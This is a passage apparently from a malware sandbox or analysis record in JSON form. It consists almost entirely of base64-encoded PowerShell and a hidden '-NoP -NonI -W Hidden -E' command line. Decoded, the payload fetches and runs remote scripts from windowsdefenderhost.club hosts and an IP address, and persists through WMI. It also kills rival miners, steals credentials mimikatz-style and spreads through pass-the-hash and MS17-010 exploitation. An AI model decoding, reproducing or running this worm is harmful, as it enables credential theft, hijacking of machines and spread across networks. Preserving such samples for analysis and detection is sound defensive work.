GkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBz